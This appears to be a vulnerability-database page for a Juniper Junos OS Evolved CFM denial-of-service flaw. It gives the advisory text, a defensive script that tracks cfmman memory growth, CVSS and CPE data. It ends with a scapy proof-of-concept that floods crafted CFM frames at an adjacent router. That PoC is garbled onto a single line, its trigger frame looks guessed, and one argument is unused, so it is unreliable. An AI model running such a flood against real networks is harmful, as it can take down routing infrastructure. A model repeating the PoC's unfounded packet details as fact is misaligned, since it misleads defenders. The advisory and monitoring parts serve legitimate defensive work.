Security Vulnerability Report
CVE-2025-52961 CVSS 6.5 MEDIUM

CVE-2025-52961

Published: 2025-10-09 16:15:45
Last Modified: 2026-01-23 18:35:18

Description

An Uncontrolled Resource Consumption vulnerability in the Connectivity Fault Management (CFM) daemon and the Connectivity Fault Management Manager (cfmman) of Juniper Networks Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016 allows an unauthenticated, adjacent attacker to cause a Denial-of-Service (DoS).

An attacker on an adjacent device sending specific valid traffic can cause cfmd to spike the CPU to 100% and cfmman's memory to leak, eventually causing the FPC to crash and restart.

Continued receipt and processing of these specific valid packets will sustain the Denial of Service (DoS) condition.

An indicator of compromise is cfmman memory rising over time. Check it by issuing the following command and evaluating the RSS number. If the RSS is growing into GBs, consider restarting the device to temporarily clear memory.

  user@device> show system processes node fpc<num> detail | match cfmman

Example:

  show system processes node fpc0 detail | match cfmman
  F S UID       PID       PPID PGID   SID   C PRI NI  ADDR SZ    WCHAN   RSS     PSR STIME TTY         TIME     CMD
  4 S root      15204     1    15204  15204 0 80  0   - 90802     -      113652   4  Sep25 ?           00:15:28 /usr/bin/cfmman -p /var/pfe -o -c /usr/conf/cfmman-cfg-active.xml

This issue affects Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016:

 * from 23.2R1-EVO before 23.2R2-S4-EVO,
 * from 23.4 before 23.4R2-S4-EVO,
 * from 24.2 before 24.2R2-EVO,
 * from 24.4 before 24.4R1-S2-EVO, 24.4R2-EVO.

This issue does not affect Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016 before 23.2R1-EVO.
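The RSS check described above can be trended over saved captures of the `show system processes node fpc<num> detail | match cfmman` output. This is an added example, not code from Juniper or from this page; it assumes RSS is reported in KiB (as in Linux `ps`) and uses a 1 GiB alert threshold for "growing into GBs", and the sample captures are constructed.

```python
# Added example (not vendor code): trend cfmman RSS across saved CLI captures.
HEADER = ("F S UID PID PPID PGID SID C PRI NI ADDR SZ WCHAN RSS "
          "PSR STIME TTY TIME CMD").split()   # column order from the advisory
PID_COL, RSS_COL, CMD_COL = (HEADER.index(c) for c in ("PID", "RSS", "CMD"))
GIB_IN_KIB = 1024 * 1024   # assumption: RSS is in KiB, as in Linux ps

def parse_cfmman(capture):
    """Return (pid, rss_kib) from the cfmman row of one capture, else None."""
    for line in capture.splitlines():
        f = line.split()
        if len(f) > CMD_COL and f[CMD_COL].endswith("/cfmman"):
            return int(f[PID_COL]), int(f[RSS_COL])
    return None

def assess(samples, alert_kib=GIB_IN_KIB):
    """samples: [(epoch_seconds, capture_text), ...] oldest first."""
    points, restarts = [], 0
    for ts, text in samples:
        row = parse_cfmman(text)
        if row is None:
            continue                      # no cfmman row in this capture
        if points and row[0] != points[-1][1]:
            restarts += 1                 # PID changed: process restarted
            points = []                   # growth baseline starts over
        points.append((ts, row[0], row[1]))
    result = {"restarts": restarts, "kib_per_hour": None,
              "status": "insufficient-data"}
    if len(points) < 2 or points[-1][0] == points[0][0]:
        return result
    (t0, _, r0), (t1, _, r1) = points[0], points[-1]
    rising = r1 > r0 and all(b[2] >= a[2] for a, b in zip(points, points[1:]))
    result["kib_per_hour"] = (r1 - r0) * 3600 / (t1 - t0)
    result["status"] = "alert" if r1 >= alert_kib else "watch" if rising else "ok"
    return result

# Constructed captures: the first row is the advisory's example; the later
# RSS values are invented for illustration.
ROW = ("4 S root {pid} 1 {pid} {pid} 0 80 0 - 90802 - {rss} 4 Sep25 ? "
       "00:15:28 /usr/bin/cfmman -p /var/pfe -o -c /usr/conf/cfmman-cfg-active.xml")
SAMPLES = [(0, ROW.format(pid=15204, rss=113652)),
           (3600, ROW.format(pid=15204, rss=613652)),
           (7200, ROW.format(pid=15204, rss=1113652))]

if __name__ == "__main__":
    print(assess(SAMPLES))
```

A PID change between captures resets the baseline and is counted separately, since a restarted cfmman (for example after an FPC restart) starts again from a low RSS.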

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos_os_evolved:23.2:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos_os_evolved:23.2:r1-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos_os_evolved:23.2:r1-s2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos_os_evolved:23.2:r2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos_os_evolved:23.2:r2-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:juniper:ptx10001-36mr:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:ptx10002-36qdd:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:ptx10004:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:ptx10008:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:ptx10016:-:*:*:*:*:*:*:* - NOT VULNERABLE
Junos OS Evolved 23.2R1-EVO to 23.2R2-S3-EVO
Junos OS Evolved 23.4 to 23.4R2-S3-EVO
Junos OS Evolved 24.2 to 24.2R1-EVO
Junos OS Evolved 24.4 to 24.4R1-S1-EVO, 24.4R1-EVO

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52961 PoC - Juniper Junos OS Evolved CFM DoS # This PoC demonstrates the attack vector by sending specific valid CFM protocol frames # to trigger CPU spike in cfmd and memory leak in cfmman #!/usr/bin/env python3 """ CVE-2025-52961 PoC Vulnerability: Uncontrolled Resource Consumption in cfmd/cfmman Affected: Juniper Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016 Attack: Send specific valid CFM frames from adjacent network to cause DoS """ from scapy.all import Ether, Dot1Q, LLC, SNAP, Raw, sendp, conf import time import argparse # CFM EtherType (IEEE 802.1ag / ITU-T Y.1731) CFM_ETHERTYPE = 0x8902 def craft_cfm_frame(target_mac="01:80:c2:00:00:30", level=3, opcode=0): """ Craft a specific CFM (Connectivity Fault Management) protocol frame. CFM uses multicast destination MAC 01:80:c2:00:00:30 (Level 3). The frame triggers resource consumption in cfmd/cfmman on vulnerable Junos OS Evolved. """ # Ethernet header with CFM multicast destination dst_mac = f"01:80:c2:00:00:3{level}" # CFM multicast MAC for given level # CFM PDU structure # MD Level (3 bits) | Version (5 bits) | Opcode (8 bits) | Flags (8 bits) | TLVs md_level_version = (level << 5) | 0 # Level 3, Version 0 # Build CFM payload cfm_payload = bytes([ md_level_version, # MD Level + Version opcode, # Opcode (0=Reserved/specific trigger) 0x00, # Flags 0x00, 0x19, # TLV offset 0x00, 0x00, 0x00, 0x01, # Sequence number 0x00, 0x01, # MD/MA ID format ]) # Construct the frame frame = Ether(dst=dst_mac, type=CFM_ETHERTYPE) / Raw(load=cfm_payload) return frame def exploit(interface, target_ip, duration=60, interval=0.01): """ Send crafted CFM frames to trigger CPU spike and memory leak. 
Args: interface: Network interface to send packets from (must be adjacent to target) target_ip: Target device IP (for reference/logging) duration: Attack duration in seconds interval: Interval between packets in seconds """ conf.verb = 0 print(f"[*] CVE-2025-52961 PoC - CFM Resource Consumption DoS") print(f"[*] Target: {target_ip}") print(f"[*] Interface: {interface}") print(f"[*] Duration: {duration}s") print(f"[*] Sending crafted CFM frames...") end_time = time.time() + duration pkt_count = 0 while time.time() < end_time: # Send CFM frame at different levels to trigger the vulnerability for level in range(0, 7): frame = craft_cfm_frame(level=level, opcode=0) sendp(frame, iface=interface, verbose=False) pkt_count += 1 time.sleep(interval) print(f"[*] Sent {pkt_count} CFM frames") print(f"[*] Attack complete. Target cfmd should show 100% CPU, cfmman memory should be leaking.") print(f"[*] Monitor with: show system processes node fpc<num> detail | match cfmman") if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-52961 PoC") parser.add_argument("-i", "--interface", required=True, help="Network interface") parser.add_argument("-t", "--target", required=True, help="Target device IP") parser.add_argument("-d", "--duration", type=int, default=60, help="Duration in seconds") args = parser.parse_args() exploit(args.interface, args.target, args.duration)
